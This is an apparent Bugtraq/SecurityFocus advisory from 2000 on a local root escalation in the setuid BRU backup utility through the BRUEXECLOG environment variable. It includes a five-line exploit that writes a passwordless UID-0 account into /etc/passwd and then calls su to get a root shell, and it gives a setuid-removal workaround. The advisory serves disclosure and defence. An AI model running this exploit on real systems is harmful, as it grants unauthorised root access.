BRU BRUEXECLOG Environment Variable Vulnerability

Bugtraq ID:	1321
Class:	Configuration Error
CVE:
Remote:	No
Local:	Yes
Published:	Jun 05 2000 12:00AM
Updated:	Jun 05 2000 12:00AM
Credit:	This vulnerability was posted to the Bugtraq mailing list on June 5, 2000 by Riley Hassell <[email protected]>
Vulnerable:	Enhanced Software Technologies BRU 16.0 - Caldera OpenLinux 2.4 - Caldera OpenLinux 2.3 - Caldera OpenLinux 2.2 - Cobalt Qube 2.0 - Cobalt Qube 1.0 - Cobalt RaQ 3.0 - Cobalt RaQ 2.0 - Cobalt RaQ 1.1 - Debian Linux 2.3 - Debian Linux 2.2 - Debian Linux 2.1 - FreeBSD FreeBSD 5.0 - FreeBSD FreeBSD 4.0 - FreeBSD FreeBSD 3.4 - FreeBSD FreeBSD 3.3 - FreeBSD FreeBSD 3.2 - FreeBSD FreeBSD 3.1 - FreeBSD FreeBSD 3.0 - Halloween Linux 4.0 - HP HP-UX 10.34 - HP HP-UX 10.30 - HP HP-UX 10.20 - HP HP-UX 10.16 - HP HP-UX 10.10 - HP HP-UX 10.9 - HP HP-UX 10.8 - HP HP-UX 10.1 0 - HP HP-UX 10.0 1 - HP HP-UX 10.0 - HP HP-UX (VVOS) 10.24 - Mandriva Linux Mandrake 7.0 - Mandriva Linux Mandrake 6.1 - Mandriva Linux Mandrake 6.0 - Redhat Linux 6.2 sparc - Redhat Linux 6.2 i386 - Redhat Linux 6.2 alpha - Redhat Linux 6.1 sparc - Redhat Linux 6.1 i386 - Redhat Linux 6.1 alpha - Redhat Linux 6.0 sparc - Redhat Linux 6.0 alpha - Redhat Linux 6.0 - SCO Open Server 5.0.5 - SCO Open Server 5.0.4 - SCO Open Server 5.0.3 - SCO Open Server 5.0.2 - SCO Open Server 5.0.1 - SCO Open Server 5.0 - SCO Unixware 7.1.1 - SCO Unixware 7.1 - SCO Unixware 7.0.1 - SCO Unixware 7.0 - Sun Solaris 2.5.1 - Sun Solaris 8_x86 - Sun Solaris 8_sparc - Sun Solaris 7.0_x86 - Sun Solaris 7.0 - Sun Solaris 2.6 - Sun Solaris 2.5 Enhanced Software Technologies BRU 15.1 - Caldera OpenLinux 2.4 - Caldera OpenLinux 2.3 - Caldera OpenLinux 2.2 - Cobalt Qube 2.0 - Cobalt Qube 1.0 - Cobalt RaQ 3.0 - Cobalt RaQ 2.0 - Cobalt RaQ 1.1 - Debian Linux 2.3 - Debian Linux 2.2 - Debian Linux 2.1 - FreeBSD FreeBSD 5.0 - FreeBSD FreeBSD 4.0 - FreeBSD FreeBSD 3.4 - FreeBSD FreeBSD 3.3 - FreeBSD FreeBSD 3.2 - FreeBSD FreeBSD 3.1 - FreeBSD FreeBSD 3.0 - Halloween Linux 4.0 - HP HP-UX 10.34 - HP HP-UX 10.30 - HP HP-UX 10.20 - HP HP-UX 10.16 - HP HP-UX 10.10 - HP HP-UX 10.9 - HP HP-UX 10.8 - HP HP-UX 10.1 0 - HP HP-UX 10.0 1 - HP HP-UX 10.0 - HP HP-UX (VVOS) 10.24 - Mandriva Linux Mandrake 7.0 - Mandriva Linux Mandrake 6.1 - Mandriva Linux Mandrake 6.0 - Redhat Linux 6.2 sparc - Redhat Linux 6.2 i386 - Redhat Linux 6.2 alpha - Redhat Linux 6.1 sparc - Redhat Linux 6.1 i386 - Redhat Linux 6.1 alpha - Redhat Linux 6.0 sparc - Redhat Linux 6.0 alpha - Redhat Linux 6.0 - SCO Open Server 5.0.5 - SCO Open Server 5.0.4 - SCO Open Server 5.0.3 - SCO Open Server 5.0.2 - SCO Open Server 5.0.1 - SCO Open Server 5.0 - SCO Unixware 7.1.1 - SCO Unixware 7.1 - SCO Unixware 7.0.1 - SCO Unixware 7.0 - Sun Solaris 2.5.1 - Sun Solaris 8_x86 - Sun Solaris 8_sparc - Sun Solaris 7.0_x86 - Sun Solaris 7.0 - Sun Solaris 2.6 - Sun Solaris 2.5
Not Vulnerable:

BRU BRUEXECLOG Environment Variable Vulnerability

A vulnerability exists in BRU, the Backup and Restore Utility, from Enhanced Software Technologies. By setting the value of the BRUEXECLOG environment variable, it is possible to an attack to alter and create files on the filesystem. As BRU is installed setuid, these files are owned by root. This vulnerability can be easily used by local users to obtain root privileges.

BRU BRUEXECLOG Environment Variable Vulnerability

$ BRUEXECLOG=/etc/passwd
$ export BRUEXECLOG
$ bru -V '
> comsec::0:0::/:/bin/sh
> '
$ su comsec
#

BRU BRUEXECLOG Environment Variable Vulnerability

Solution:
Currently the SecurityFocus staff are not ware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].

Removal of the setuid bit from the bru binary will cause it to complain about needing to be setuid root, when run by normal users. So long as the bru utility is only run as root, its operation will be unaffected.